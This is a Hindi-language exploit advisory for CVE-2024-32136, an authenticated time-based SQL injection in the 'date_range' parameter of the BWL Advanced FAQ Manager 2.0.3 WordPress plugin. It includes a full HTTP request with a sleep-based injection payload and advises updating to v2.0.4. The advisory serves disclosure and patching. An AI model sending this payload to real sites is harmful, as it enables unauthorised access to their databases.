
शोषण शीर्षक: BWL Advanced FAQ Manager 2.0.3 - प्रमाणीकरण-पश्चात SQL इंजेक्शन
दिनांक: 14 Apr 2024
शोषण लेखक: Ivan Spiridonov (xbz0n)
सॉफ़्टवेयर लिंक: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
संस्करण: 2.0.3
परीक्षण किया गया: Ubuntu 20.04
CVE: CVE-2024-32136
SQL इंजेक्शन एक प्रकार की सुरक्षा भेद्यता है जो किसी हमलावर को एप्लिकेशन के डेटाबेस क्वेरीज़ में हस्तक्षेप करने की अनुमति देती है। इसमें आमतौर पर क्लाइंट से एप्लिकेशन में इनपुट डेटा के माध्यम से SQL क्वेरी का सम्मिलन या "इंजेक्शन" शामिल होता है। एक सफल SQL इंजेक्शन शोषण डेटाबेस से संवेदनशील डेटा पढ़ सकता है, डेटाबेस डेटा को संशोधित कर सकता है (इन्सर्ट/अपडेट/डिलीट), डेटाबेस पर प्रशासनिक ऑपरेशन निष्पादित कर सकता है (जैसे DBMS को बंद करना), DBMS फाइल सिस्टम पर मौजूद किसी दिए गए फ़ाइल की सामग्री पुनर्प्राप्त कर सकता है, और कुछ मामलों में, ऑपरेटिंग सिस्टम को कमांड जारी कर सकता है।
यह भेद्यता BWL Advanced FAQ Manager प्लगइन के 'bwl-advanced-faq-analytics' पृष्ठ में उपयोग किए जाने वाले 'date_range' पैरामीटर के भीतर मौजूद है। प्रमाणित हमलावर इस पैरामीटर के इनपुट में हेरफेर करके डेटाबेस के भीतर मनमाने SQL कमांड निष्पादित कर सकते हैं।
निम्नलिखित GET अनुरोध भेद्यता को प्रदर्शित करता है:
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [Relevant Cookies]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
यदि सर्वर प्रतिक्रिया लगभग 20 सेकंड तक विलंबित होती है, तो यह समय-आधारित SQL इंजेक्शन के सफल शोषण का संकेत देता है, जो भेद्यता की पुष्टि करता है।
BWL Advanced FAQ Manager v2.0.3 उपयोगकर्ताओं को सलाह दी जाती है कि वे प्लगइन को फिक्स्ड संस्करण v2.0.4 में अपडेट करें।